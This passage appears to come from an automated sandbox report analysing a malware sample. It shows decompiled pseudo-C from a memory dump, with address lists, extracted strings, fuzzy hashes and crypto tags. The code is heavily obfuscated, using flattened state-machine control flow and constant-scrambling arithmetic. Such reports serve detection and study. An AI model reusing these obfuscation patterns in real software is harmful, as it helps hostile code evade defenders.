				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				void* _t420;
				intOrPtr _t431;
				void* _t432;
				void* _t468;
				signed int _t477;
				signed int _t478;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				signed int _t482;
				signed int _t483;
				signed int _t484;
				signed int _t485;
				intOrPtr _t486;
				intOrPtr* _t488;
				intOrPtr _t489;
				intOrPtr _t492;
				signed int* _t493;
				void* _t496;

				_t493 =  &_v1748;
				_v1576 = 0x6e590e;
				asm("stosd");
				_t489 = 0;
				_t432 = 0x1271f89;
				_v1596 = 0;
				asm("stosd");
				asm("stosd");
				_v1692 = 0x25e763;
				_v1692 = _v1692 << 6;
				_v1692 = _v1692 << 0xb;
				_v1692 = _v1692 ^ 0xcec60029;
				_v1600 = 0x91eaa3;
				_v1600 = _v1600 + 0xffffe219;
				_v1600 = _v1600 ^ 0x009ecc83;
				_v1732 = 0x93834b;
				_v1732 = _v1732 + 0x8a3c;
				_v1732 = _v1732 << 0xc;
				_v1732 = _v1732 ^ 0x2bc6100d;
				_v1732 = _v1732 ^ 0x6b1e600f;
				_v1708 = 0x2e8957;
				_v1708 = _v1708 >> 0xd;
				_t477 = 0x4a;
				_v1708 = _v1708 * 0x4e;
				_v1708 = _v1708 | 0x26e756fb;
				_v1708 = _v1708 ^ 0x26e777f9;
				_v1632 = 0xe17a5f;
				_t35 =  &_v1632; // 0xe17a5f
				_v1632 =  *_t35 * 0x1b;
				_v1632 = _v1632 ^ 0x17c7e805;
				_v1716 = 0x3cf28b;
				_v1716 = _v1716 / _t477;
				_v1716 = _v1716 + 0xac53;
				_v1716 = _v1716 ^ 0x32f0c66e;
				_v1716 = _v1716 ^ 0x32f1b955;
				_v1688 = 0xed0796;
				_t478 = 0x52;
				_v1688 = _v1688 * 0x30;
				_v1688 = _v1688 << 0xd;
				_v1688 = _v1688 ^ 0x2d8f6ae2;
				_v1668 = 0xce7734;
				_v1668 = _v1668 * 0x5d;
				_v1668 = _v1668 + 0xf9a1;
				_v1668 = _v1668 ^ 0x4b0c45c1;
				_v1584 = 0x72847c;
				_v1584 = _v1584 | 0xceffe45f;
				_v1584 = _v1584 ^ 0xcef124a7;
				_v1736 = 0xc287ed;
				_v1736 = _v1736 + 0xed10;
				_v1736 = _v1736 | 0x0d176592;
				_v1736 = _v1736 / _t478;
				_v1736 = _v1736 ^ 0x002e9959;
				_v1672 = 0xd2d107;
				_v1672 = _v1672 + 0xffff034c;
				_v1672 = _v1672 ^ 0x1de22649;
				_v1672 = _v1672 ^ 0x1d3aa339;
				_v1588 = 0x2e34f2;
				_v1588 = _v1588 ^ 0x2a762ba5;
				_v1588 = _v1588 ^ 0x2a5832a9;
				_v1624 = 0x19b4ee;
				_v1624 = _v1624 << 8;
				_v1624 = _v1624 ^ 0x19b4f563;
				_v1744 = 0xb54437;
				_v1744 = _v1744 + 0x64dd;
				_v1744 = _v1744 << 0x10;
				_v1744 = _v1744 << 0xa;
				_v1744 = _v1744 ^ 0x50093d55;
				_v1660 = 0x5b93ae;
				_v1660 = _v1660 ^ 0x83ec1b30;
				_t479 = 0x61;
				_v1660 = _v1660 / _t479;
				_v1660 = _v1660 ^ 0x015da7c3;
				_v1592 = 0xf9dd5e;
				_v1592 = _v1592 >> 9;
				_v1592 = _v1592 ^ 0x0008daae;
				_v1636 = 0x3b8a94;
				_v1636 = _v1636 + 0xffff8f07;
				_v1636 = _v1636 ^ 0x00309d5d;
				_v1684 = 0x2d479;
				_v1684 = _v1684 >> 0xf;
				_t480 = 0x48;
				_v1684 = _v1684 / _t480;
				_v1684 = _v1684 ^ 0x0007d86e;
				_v1652 = 0xe6bd05;
				_t481 = 0x47;
				_v1652 = _v1652 / _t481;
				_v1652 = _v1652 + 0xffff7fd3;
				_v1652 = _v1652 ^ 0x00012c92;
				_v1608 = 0x57aee9;
				_v1608 = _v1608 | 0xdd545d8c;
				_v1608 = _v1608 ^ 0xdd523007;
				_v1580 = 0xa78d0e;
				_v1580 = _v1580 + 0xffff60d2;
				_v1580 = _v1580 ^ 0x00a10c55;
				_v1616 = 0xb4624a;
				_v1616 = _v1616 + 0xffff8b9a;
				_v1616 = _v1616 ^ 0x00bd87cf;
				_v1712 = 0xc24799;
				_v1712 = _v1712 << 0xf;
				_v1712 = _v1712 | 0x2d12fa88;
				_v1712 = _v1712 ^ 0xe629f9ff;
				_v1712 = _v1712 ^ 0xc9f04c28;
				_v1728 = 0x6f003d;
				_v1728 = _v1728 | 0xc2cda76d;
				_v1728 = _v1728 ^ 0x5a454f8d;
				_v1728 = _v1728 << 6;
				_v1728 = _v1728 ^ 0x2abe072a;
				_v1704 = 0x33a4b7;
				_v1704 = _v1704 >> 1;
				_v1704 = _v1704 ^ 0xa80a2fdf;
				_v1704 = _v1704 + 0x3f1e;
				_v1704 = _v1704 ^ 0xa81cd8a7;
				_v1696 = 0x980075;
				_t482 = 0x50;
				_v1696 = _v1696 / _t482;
				_v1696 = _v1696 + 0x1c64;
				_v1696 = _v1696 ^ 0x000b1bf4;
				_v1700 = 0xf2fe2f;
				_v1700 = _v1700 << 0xa;
				_v1700 = _v1700 << 4;
				_t483 = 0x66;
				_v1700 = _v1700 / _t483;
				_v1700 = _v1700 ^ 0x01ed8c9b;
				_v1620 = 0xace977;
				_v1620 = _v1620 + 0xffff631c;
				_v1620 = _v1620 ^ 0x00aa0308;
				_v1680 = 0x4aa103;
				_v1680 = _v1680 + 0x3516;
				_v1680 = _v1680 + 0x2c34;
				_v1680 = _v1680 ^ 0x004adf0b;
				_v1628 = 0x81a681;
				_v1628 = _v1628 << 0xc;
				_v1628 = _v1628 ^ 0x1a65e79e;
				_v1724 = 0x351f92;
				_v1724 = _v1724 + 0x697d;
				_v1724 = _v1724 + 0x6eb2;
				_v1724 = _v1724 ^ 0x7af5ee19;
				_v1724 = _v1724 ^ 0x7ac878b2;
				_v1740 = 0x5e189f;
				_v1740 = _v1740 << 1;
				_v1740 = _v1740 << 1;
				_v1740 = _v1740 >> 9;
				_v1740 = _v1740 ^ 0x00060c5e;
				_v1748 = 0x6875b5;
				_v1748 = _v1748 ^ 0x4f2bd646;
				_v1748 = _v1748 + 0x9efa;
				_v1748 = _v1748 >> 4;
				_v1748 = _v1748 ^ 0x04f34ab5;
				_v1612 = 0xdb25ef;
				_v1612 = _v1612 + 0xffff2294;
				_v1612 = _v1612 ^ 0x00d2f001;
				_v1656 = 0x4d12bf;
				_v1656 = _v1656 >> 7;
				_v1656 = _v1656 ^ 0x99f0327b;
				_v1656 = _v1656 ^ 0x99fa044d;
				_v1664 = 0xaadbb1;
				_t484 = 0x4e;
				_t431 = _v1596;
				_v1664 = _v1664 / _t484;
				_v1664 = _v1664 >> 0xb;
				_v1664 = _v1664 ^ 0x000192a1;
				_v1644 = 0x161828;
				_v1644 = _v1644 << 0xa;
				_v1644 = _v1644 ^ 0x6a81f6c2;
				_v1644 = _v1644 ^ 0x32ef9595;
				_v1676 = 0xfd7b1b;
				_v1676 = _v1676 | 0xa631d089;
				_v1676 = _v1676 << 6;
				_v1676 = _v1676 ^ 0xbf74e990;
				_v1720 = 0xacec22;
				_t485 = 0xa;
				_t492 = _v1596;
				_v1720 = _v1720 * 0x1c;
				_v1720 = _v1720 | 0xee52f364;
				_v1720 = _v1720 / _t485;
				_v1720 = _v1720 ^ 0x1972952b;
				_v1640 = 0x8959;
				_t486 = _v1596;
				_v1640 = _v1640 / _t485;
				_v1640 = _v1640 ^ 0xafd0792f;
				_v1640 = _v1640 ^ 0xafddd38b;
				_v1648 = 0x50e235;
				_v1648 = _v1648 | 0xff6e3f4b;
				_v1648 = _v1648 ^ 0xff7159fb;
				_v1604 = 0xa8578a;
				_v1604 = _v1604 ^ 0x6c29ee87;
				_v1604 = _v1604 ^ 0x6c8f30b2;
				while(1) {
					L1:
					_t468 = 0x5c;
					do {
						L2:
						_t496 = _t432 - 0x44fcf42;
						if(_t496 > 0) {
							__eflags = _t432 - 0x8af10a3;
							if(_t432 == 0x8af10a3) {
								_t488 =  *0x10025208 + 0x1c;
								while(1) {
									__eflags =  *_t488 - _t468;
									if( *_t488 == _t468) {
										break;
									}
									_t488 = _t488 + 2;
									__eflags = _t488;
								}
								_t486 = _t488 + 2;
								__eflags = _t486;
								_t432 = 0x44fcf42;
								goto L24;
							} else {
								__eflags = _t432 - 0xb7821d2;
								if(_t432 == 0xb7821d2) {
									E1001A712(_v1612, _t492, _t431, _v1656, _v1664);
									_t493 =  &(_t493[3]);
									_t432 = 0x22bb976;
									goto L1;
								} else {
									__eflags = _t432 - 0xcbe35d4;
									if(_t432 != 0xcbe35d4) {
										goto L24;
									} else {
										_push(_v1748);
										_push(_t431);
										_push(_v1740);
										_push(_t432);
										_push(_v1632);
										_push(_t486);
										_push(_v1732);
										_push(_v1724);
										_push( &_v520);
										_push(_v1628);
										_push(_v1680);
										_push(_v1620);
										_push(_t432);
										_push(_v1716);
										_push(_v1708);
										_push(_t486);
										_t492 = E10001984(_v1696, _v1700);
										_t493 = _t493 - 0xc + 0x4c;
										__eflags = _t492;
										if(_t492 == 0) {
											goto L10;
										} else {
											_t432 = 0xb7821d2;
											_t489 = 1;
											_v1596 = 1;
											while(1) {
												L1:
												_t468 = 0x5c;
												goto L2;
											}
										}
									}
								}
							}
						} else {
							if(_t496 == 0) {
								_t431 = E1001DCE6(_v1600, _v1712, _t432, _v1728, _v1704);
								_t493 =  &(_t493[4]);
								__eflags = _t431;
								if(_t431 != 0) {
									_t432 = 0xcbe35d4;
									while(1) {
										L1:
										_t468 = 0x5c;
										goto L2;
									}
								}
							} else {
								if(_t432 == 0xef3ed3) {
									E10010839(_v1640, _t431, _v1648, _v1604);
								} else {
									if(_t432 == 0x1271f89) {
										_push(_t432);
										E1000441F(_v1688, _v1692, _v1668, _v1584,  &_v1560, _t432, _v1736);
										_t493 =  &(_t493[7]);
										_t432 = 0x239f135;
										while(1) {
											L1:
											_t468 = 0x5c;
											goto L2;
										}
									} else {
										if(_t432 == 0x22bb976) {
											E10010839(_v1644, _t492, _v1676, _v1720);
											L10:
											_t432 = 0xef3ed3;
											while(1) {
												L1:
												_t468 = 0x5c;
												goto L2;
											}
										} else {
											_t500 = _t432 - 0x239f135;
											if(_t432 != 0x239f135) {
												goto L24;
											} else {
												_push(_v1744);
												_push(_v1624);
												_push(_v1588);
												_t420 = E1000416C(_v1672, 0x10001804);
												E1000FE15( &_v1040, _t500);
												E1000FFBA( &_v1560,  &_v1040, _v1660, _v1592,  *0x10025208 + 0x230,  &_v520, _v1636, 0x104, _v1684, _t420, _v1652);
												E1000B952(_v1608, _t420, _v1580, _v1616);
												_t489 = _v1596;
												_t493 =  &(_t493[0xf]);
												_t432 = 0x8af10a3;
												while(1) {
													L1:
													_t468 = 0x5c;
													goto L2;
												}
											}
										}
									}
								}
							}
						}
						L27:
						return _t489;
						L24:
						__eflags = _t432 - 0xf360ede;
					} while (_t432 != 0xf360ede);
					goto L27;
				}
			}

0x100057e6
0x100057ec
0x10005806
0x10005807
0x1000580b
0x10005810
0x10005817
0x10005818
0x10005819
0x10005821
0x10005826
0x1000582b
0x10005833
0x1000583e
0x10005849
0x10005854
0x1000585c
0x10005864
0x10005869
0x10005871
0x10005879
0x10005881
0x1000588b
0x1000588e
0x10005892
0x1000589a
0x100058a2
0x100058ad
0x100058b5
0x100058bc
0x100058c7
0x100058d7
0x100058db
0x100058e3
0x100058eb
0x100058f3
0x10005900
0x10005901
0x10005905
0x1000590a
0x10005912
0x1000591f
0x10005923
0x1000592b
0x10005933
0x1000593e
0x10005949
0x10005954
0x1000595c
0x10005964
0x10005972
0x10005976
0x1000597e
0x10005986
0x1000598e
0x10005996
0x1000599e
0x100059a9
0x100059b4
0x100059bf
0x100059ca
0x100059d2
0x100059dd
0x100059e5
0x100059ed
0x100059f2
0x100059f9
0x10005a01
0x10005a09
0x10005a17
0x10005a1c
0x10005a22
0x10005a2a
0x10005a35
0x10005a3d
0x10005a48
0x10005a53
0x10005a5e
0x10005a69
0x10005a71
0x10005a7a
0x10005a7f
0x10005a85
0x10005a8d
0x10005a99
0x10005a9e
0x10005aa4
0x10005aac
0x10005ab4
0x10005abf
0x10005aca
0x10005ad5
0x10005ae0
0x10005aeb
0x10005af6
0x10005b01
0x10005b0c
0x10005b17
0x10005b1f
0x10005b24
0x10005b2c
0x10005b34
0x10005b3c
0x10005b44
0x10005b4c
0x10005b54
0x10005b59
0x10005b61
0x10005b69
0x10005b6d
0x10005b75
0x10005b7d
0x10005b85
0x10005b91
0x10005b96
0x10005b9c
0x10005ba4
0x10005bac
0x10005bb4
0x10005bb9
0x10005bc2
0x10005bc5
0x10005bc9
0x10005bd1
0x10005bdc
0x10005be7
0x10005bf2
0x10005bfc
0x10005c04
0x10005c0c
0x10005c14
0x10005c1f
0x10005c27
0x10005c32
0x10005c3a
0x10005c42
0x10005c4a
0x10005c52
0x10005c5a
0x10005c62
0x10005c66
0x10005c6a
0x10005c6f
0x10005c77
0x10005c7f
0x10005c87
0x10005c8f
0x10005c94
0x10005c9c
0x10005ca7
0x10005cb2
0x10005cbd
0x10005cc5
0x10005cca
0x10005cd2
0x10005cda
0x10005ce8
0x10005ced
0x10005cf4
0x10005cf8
0x10005cfd
0x10005d05
0x10005d0d
0x10005d12
0x10005d1a
0x10005d22
0x10005d2a
0x10005d32
0x10005d37
0x10005d3f
0x10005d4e
0x10005d4f
0x10005d56
0x10005d5a
0x10005d6a
0x10005d6e
0x10005d76
0x10005d84
0x10005d8b
0x10005d8f
0x10005d97
0x10005d9f
0x10005da7
0x10005daf
0x10005db7
0x10005dc2
0x10005dcd
0x10005dd8
0x10005dd8
0x10005dda
0x10005ddb
0x10005ddb
0x10005ddb
0x10005de1
0x10005f53
0x10005f59
0x10006019
0x10006021
0x10006021
0x10006024
0x00000000
0x00000000
0x1000601e
0x1000601e
0x1000601e
0x10006026
0x10006026
0x10006029
0x00000000
0x10005f5f
0x10005f5f
0x10005f65
0x10006001
0x10006006
0x10006009
0x00000000
0x10005f6b
0x10005f6b
0x10005f71
0x00000000
0x10005f77
0x10005f77
0x10005f82
0x10005f83
0x10005f87
0x10005f88
0x10005f92
0x10005f93
0x10005f97
0x10005f9b
0x10005f9c
0x10005fa3
0x10005faa
0x10005fb1
0x10005fb2
0x10005fb6
0x10005fc8
0x10005fce
0x10005fd0
0x10005fd3
0x10005fd5
0x00000000
0x10005fdb
0x10005fdd
0x10005fe2
0x10005fe3
0x10005dd8
0x10005dd8
0x10005dda
0x00000000
0x10005dda
0x10005dd8
0x10005fd5
0x10005f71
0x10005f65
0x10005de7
0x10005de7
0x10005f3c
0x10005f3e
0x10005f41
0x10005f43
0x10005f49
0x10005dd8
0x10005dd8
0x10005dda
0x00000000
0x10005dda
0x10005dd8
0x10005ded
0x10005df3
0x10006050
0x10005df9
0x10005dff
0x10005ef0
0x10005f11
0x10005f16
0x10005f19
0x10005dd8
0x10005dd8
0x10005dda
0x00000000
0x10005dda
0x10005e05
0x10005e0b
0x10005edf
0x10005ee6
0x10005ee6
0x10005dd8
0x10005dd8
0x10005dda
0x00000000
0x10005dda
0x10005e11
0x10005e11
0x10005e17
0x00000000
0x10005e1d
0x10005e1d
0x10005e26
0x10005e2d
0x10005e38
0x10005e46
0x10005e99
0x10005eb5
0x10005eba
0x10005ec1
0x10005ec4
0x10005dd8
0x10005dd8
0x10005dda
0x00000000
0x10005dda
0x10005dd8
0x10005e17
0x10005e0b
0x10005dff
0x10005df3
0x10005de7
0x10006058
0x10006063
0x1000602e
0x1000602e
0x1000602e
0x00000000
0x1000603a

Strings

}i, xrefs: 10005C3A
u, xrefs: 10005B85
_z, xrefs: 100058AD
U=P, xrefs: 100059F9
), xrefs: 1000582B
4,, xrefs: 10005C04
c%, xrefs: 10005819
5P, xrefs: 10005D9F

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: )$4,$5P$U=P$_z$c%$u$}i
API String ID: 0-4263214790
Opcode ID: e0c191c61cea4e6c9b767d2ac324ab4dc74fe90896c3c9f1a76a9e23ff3e2a64
Instruction ID: e66405ca4b5f15bf0c36e52834f486d8166b0e68ef2333da25794c18804fd7d7
Opcode Fuzzy Hash: e0c191c61cea4e6c9b767d2ac324ab4dc74fe90896c3c9f1a76a9e23ff3e2a64
Instruction Fuzzy Hash: BA1223715083809FE3A9CF21C58965BFBE2FBC4758F20891DE6DA86260D7B58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 10010ED9, Relevance: 10.3, Strings: 8, Instructions: 305
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E10010ED9(intOrPtr* __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				unsigned int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				void* _t350;
				void* _t352;
				void* _t353;
				void* _t366;
				signed int _t369;
				signed int _t370;
				signed int _t371;
				signed int _t372;
				signed int _t373;
				signed int _t374;
				intOrPtr* _t410;
				intOrPtr _t414;
				signed int* _t415;

				_t415 =  &_v168;
				_t410 = __ecx;
				_v20 = __ecx;
				_v16 = 0xfeb17b;
				_v12 = 0x911cc5;
				_t414 = 0;
				_t366 = 0x63ef025;
				_v8 = 0;
				_v4 = 0;
				_v164 = 0x690aec;
				_v164 = _v164 >> 0xb;
				_t369 = 0x70;
				_v164 = _v164 / _t369;
				_v164 = _v164 + 0xffffc43d;
				_v164 = _v164 ^ 0xffffc45b;
				_v148 = 0xa585fd;
				_v148 = _v148 >> 7;
				_v148 = _v148 ^ 0xed7a2f32;
				_v148 = _v148 + 0xffff0abb;
				_v148 = _v148 ^ 0xed7a6ef4;
				_v108 = 0xceae5a;
				_v108 = _v108 | 0x0f206d1f;
				_v108 = _v108 << 0xd;
				_v108 = _v108 ^ 0xddebe000;
				_v88 = 0x7c468f;
				_t370 = 0x58;
				_v88 = _v88 * 0x1c;
				_v88 = _v88 + 0xb273;
				_v88 = _v88 ^ 0x0d986a17;
				_v116 = 0x3e7517;
				_v116 = _v116 | 0x90650ae8;
				_v116 = _v116 + 0xffff915b;
				_v116 = _v116 << 5;
				_v116 = _v116 ^ 0x0fe22b40;
				_v44 = 0x3360b6;
				_v44 = _v44 | 0xfcee8ddf;
				_v44 = _v44 ^ 0xfcf5ceb1;
				_v112 = 0xd0b20b;
				_v112 = _v112 / _t370;
				_v112 = _v112 | 0xe076e0e0;
				_v112 = _v112 ^ 0xe07b4a3c;
				_v28 = 0xc1873b;
				_v28 = _v28 << 0xb;
				_v28 = _v28 ^ 0x0c3b6c17;
				_v80 = 0xe2936e;
				_v80 = _v80 >> 0xb;
				_v80 = _v80 | 0x89d0f107;
				_v80 = _v80 ^ 0x89d20e19;
				_v68 = 0xdc2a91;
				_v68 = _v68 | 0x013f69b2;
				_v68 = _v68 ^ 0x01fbcc73;
				_v168 = 0xbb660d;
				_v168 = _v168 >> 1;
				_v168 = _v168 + 0xc00d;
				_v168 = _v168 * 0x4c;
				_v168 = _v168 ^ 0x1c0e87cf;
				_v144 = 0x636bc4;
				_v144 = _v144 << 9;
				_v144 = _v144 << 7;
				_v144 = _v144 >> 2;
				_v144 = _v144 ^ 0x1afb3873;
				_v100 = 0x1809e6;
				_v100 = _v100 ^ 0xf853e6bc;
				_v100 = _v100 >> 0xd;
				_v100 = _v100 ^ 0x000212c1;
				_v156 = 0x7457ec;
				_v156 = _v156 + 0x2137;
				_v156 = _v156 >> 0x10;
				_v156 = _v156 >> 9;
				_v156 = _v156 ^ 0x0003de1e;
				_v64 = 0x37f80e;
				_v64 = _v64 | 0xbb2ae6fc;
				_v64 = _v64 ^ 0xbb350ffb;
				_v92 = 0xcdac33;
				_v92 = _v92 + 0xffff7efc;
				_t371 = 0x77;
				_v92 = _v92 * 0x24;
				_v92 = _v92 ^ 0x1cd0f6a3;
				_v76 = 0xb377d9;
				_v76 = _v76 << 7;
				_v76 = _v76 / _t371;
				_v76 = _v76 ^ 0x00c83f48;
				_v84 = 0x4386a9;
				_t372 = 0x44;
				_v84 = _v84 / _t372;
				_v84 = _v84 + 0xac78;
				_v84 = _v84 ^ 0x0007f20f;
				_v56 = 0x1b3655;
				_v56 = _v56 << 0xb;
				_v56 = _v56 ^ 0xd9b97516;
				_v132 = 0x577dc;
				_t373 = 0x62;
				_v132 = _v132 / _t373;
				_v132 = _v132 + 0xffffee04;
				_t374 = 0x52;
				_v132 = _v132 / _t374;
				_v132 = _v132 ^ 0x031b31bf;
				_v48 = 0xf8e853;
				_v48 = _v48 + 0xffffa747;
				_v48 = _v48 ^ 0x00fd19c3;
				_v140 = 0x99fce;
				_v140 = _v140 * 0x3f;
				_v140 = _v140 << 0xa;
				_v140 = _v140 | 0x815631db;
				_v140 = _v140 ^ 0xf95cbcff;
				_v32 = 0x5f3fc4;
				_v32 = _v32 + 0xffff66c1;
				_v32 = _v32 ^ 0x005c0caa;
				_v160 = 0x9f2afc;
				_v160 = _v160 + 0xffff42b1;
				_v160 = _v160 << 4;
				_v160 = _v160 | 0x728fcd2f;
				_v160 = _v160 ^ 0x7be842c9;
				_v128 = 0xa2d03f;
				_v128 = _v128 >> 0x10;
				_v128 = _v128 ^ 0x0589a77d;
				_v128 = _v128 << 9;
				_v128 = _v128 ^ 0x1342ac3b;
				_v60 = 0x9c9f71;
				_v60 = _v60 | 0xcd5d8ade;
				_v60 = _v60 ^ 0xcddabaa6;
				_v36 = 0x28db88;
				_v36 = _v36 * 0x69;
				_v36 = _v36 ^ 0x10c8a9f9;
				_v72 = 0xeba332;
				_v72 = _v72 >> 5;
				_v72 = _v72 ^ 0x000a67a8;
				_v152 = 0x5d6a21;
				_v152 = _v152 >> 0xd;
				_v152 = _v152 * 0x7c;
				_v152 = _v152 * 0x58;
				_v152 = _v152 ^ 0x0070241d;
				_v136 = 0x176fda;
				_v136 = _v136 * 0x48;
				_v136 = _v136 + 0xffffea43;
				_v136 = _v136 | 0x99361fc0;
				_v136 = _v136 ^ 0x9fb31699;
				_v104 = 0x256d2a;
				_v104 = _v104 >> 0xd;
				_v104 = _v104 | 0x0b19c2ca;
				_v104 = _v104 ^ 0x0b1d6276;
				_v96 = 0x735d2d;
				_v96 = _v96 << 0xd;
				_v96 = _v96 ^ 0x3627517c;
				_v96 = _v96 ^ 0x5d87e3d2;
				_v52 = 0xf7f6ce;
				_v52 = _v52 >> 0xf;
				_v52 = _v52 ^ 0x0001aa4b;
				_v120 = 0x838f95;
				_v120 = _v120 * 0x2b;
				_v120 = _v120 + 0xffffe24d;
				_v120 = _v120 >> 8;
				_v120 = _v120 ^ 0x00118a27;
				_v40 = 0xacb1c;
				_v40 = _v40 >> 0xf;
				_v40 = _v40 ^ 0x000071f1;
				_v124 = 0xb942ad;
				_v124 = _v124 * 0x32;
				_v124 = _v124 * 0xb;
				_v124 = _v124 ^ 0xcbf10456;
				_v124 = _v124 ^ 0x45f18fe0;
				while(1) {
					L1:
					_t350 = 0xb808c9c;
					do {
						while(_t366 != 0x56fc8c7) {
							if(_t366 == 0x63ef025) {
								_t366 = 0xb253363;
								continue;
							} else {
								if(_t366 == 0xb253363) {
									_push(_v80);
									_push(_v28);
									_push(_v112);
									_t352 = E1000416C(_v44, 0x10001120);
									_push(_v100);
									_push(_v144);
									_push(_v168);
									_t353 = E1000416C(_v68, 0x10001040);
									_t314 =  &_v156; // 0xe07b4a3c
									E1001E1AC( *_t314,  &_v24, _v164, _t352, _v64, _v92, _t353);
									_t366 =  ==  ? 0xb808c9c : 0x4b9d448;
									E1000B952(_v76, _t352, _v84, _v56);
									E1000B952(_v132, _t353, _v48, _v140);
									_t410 = _v20;
									_t415 =  &(_t415[0xf]);
									L10:
									_t350 = 0xb808c9c;
								} else {
									if(_t366 == _t350) {
										_push(_v60);
										_push(_v128);
										_push(_v160);
										E1001030B( *_t410, _v24, _v36,  *0x10025218 + 0x5c,  *((intOrPtr*)(_t410 + 4)), _v72, E1000416C(_v32, 0x10001080), _v152, _v136, _v104, _v108);
										_t366 = 0x56fc8c7;
										_t414 =  ==  ? 1 : _t414;
										E1000B952(_v96, _t360, _v52, _v120);
										_t415 =  &(_t415[0xf]);
										goto L1;
									}
								}
							}
							goto L11;
						}
						_t324 =  &_v116; // 0xe07b4a3c
						E1000C1CB(_v40, _v24,  *_t324, _v124);
						_t366 = 0x4b9d448;
						goto L10;
						L11:
					} while (_t366 != 0x4b9d448);
					return _t414;
				}
			}

0x10010ed9
0x10010ee3
0x10010ee5
0x10010eec
0x10010ef9
0x10010f04
0x10010f06
0x10010f0b
0x10010f12
0x10010f19
0x10010f21
0x10010f2c
0x10010f31
0x10010f37
0x10010f3f
0x10010f47
0x10010f4f
0x10010f54
0x10010f5c
0x10010f64
0x10010f6c
0x10010f74
0x10010f7c
0x10010f81
0x10010f89
0x10010f96
0x10010f97
0x10010f9b
0x10010fa3
0x10010fab
0x10010fb3
0x10010fbb
0x10010fc3
0x10010fc8
0x10010fd0
0x10010fdb
0x10010fe6
0x10010ff1
0x10010fff
0x10011003
0x1001100b
0x10011013
0x1001101e
0x10011026
0x10011031
0x10011039
0x1001103e
0x10011046
0x1001104e
0x10011056
0x1001105e
0x10011066
0x1001106e
0x10011072
0x1001107f
0x10011083
0x1001108b
0x10011093
0x10011098
0x1001109d
0x100110a2
0x100110aa
0x100110b2
0x100110ba
0x100110bf
0x100110c7
0x100110cf
0x100110d7
0x100110dc
0x100110e3
0x100110eb
0x100110f3
0x100110fb
0x10011103
0x1001110b
0x1001111a
0x1001111d
0x10011121
0x10011129
0x10011131
0x1001113e
0x10011142
0x1001114a
0x10011156
0x1001115b
0x10011161
0x10011169
0x10011171
0x1001117c
0x10011184
0x1001118f
0x1001119b
0x100111a0
0x100111a6
0x100111b2
0x100111b5
0x100111b9
0x100111c1
0x100111cc
0x100111d7
0x100111e2
0x100111ef
0x100111f3
0x100111f8
0x10011200
0x10011208
0x10011213
0x1001121e
0x10011229
0x10011231
0x10011239
0x1001123e
0x10011246
0x1001124e
0x10011256
0x1001125b
0x10011263
0x10011268
0x10011270
0x10011278
0x10011280
0x10011288
0x1001129b
0x100112a2
0x100112ad
0x100112b5
0x100112ba
0x100112c2
0x100112ca
0x100112d4
0x100112dd
0x100112e1
0x100112e9
0x100112f6
0x100112fa
0x10011302
0x1001130a
0x10011312
0x1001131a
0x1001131f
0x10011327
0x1001132f
0x10011337
0x1001133c
0x10011344
0x1001134c
0x10011357
0x1001135f
0x1001136a
0x10011377
0x1001137b
0x10011383
0x10011388
0x10011390
0x1001139b
0x100113a3
0x100113ae
0x100113bb
0x100113c4
0x100113c8
0x100113d0
0x100113d8
0x100113d8
0x100113d8
0x100113dd
0x100113dd
0x100113ef
0x1001154d
0x00000000
0x100113f5
0x100113fb
0x10011498
0x100114a1
0x100114a8
0x100114b3
0x100114b8
0x100114c3
0x100114c7
0x100114d2
0x100114f1
0x100114f5
0x10011523
0x10011526
0x1001153c
0x10011541
0x10011548
0x10011579
0x10011579
0x10011401
0x10011403
0x10011409
0x10011412
0x10011416
0x1001145c
0x10011473
0x10011486
0x1001148b
0x10011490
0x00000000
0x10011490
0x10011403
0x100113fb
0x00000000
0x100113ef
0x1001155b
0x1001156d
0x10011574
0x00000000
0x1001157e
0x1001157e
0x10011596
0x10011596

Strings

<J{, xrefs: 100114F1
*m%, xrefs: 10011312
!j], xrefs: 100112C2
Wt, xrefs: 100110C7
7!, xrefs: 100110CF
|Q'6, xrefs: 1001133C
2/z, xrefs: 10010F54
i, xrefs: 10010F19

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: !j]$*m%$2/z$7!$<J{$|Q'6$i$Wt
API String ID: 0-4041778638
Opcode ID: 0cb075118a083b8b687675bb6f8d201226286ea1827d5ee9416f488024ee3e35
Instruction ID: 9bf760b37d53a030ffd2162e0113f700a2b2ebfbad019f417c550bd55b45c56d
Opcode Fuzzy Hash: 0cb075118a083b8b687675bb6f8d201226286ea1827d5ee9416f488024ee3e35
Instruction Fuzzy Hash: 50F1EE715087809FD368CF65C48A64FBBE2FBC4398F50891DE1DA86261C7B58989CF47

Uniqueness

Uniqueness Score: -1.00%

Function 10013FF3, Relevance: 9.4, Strings: 7, Instructions: 645
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E10013FF3(void* __ecx) {
				char _v524;
				char _v1044;
				char _v1564;
				char _v2084;
				char _v2604;
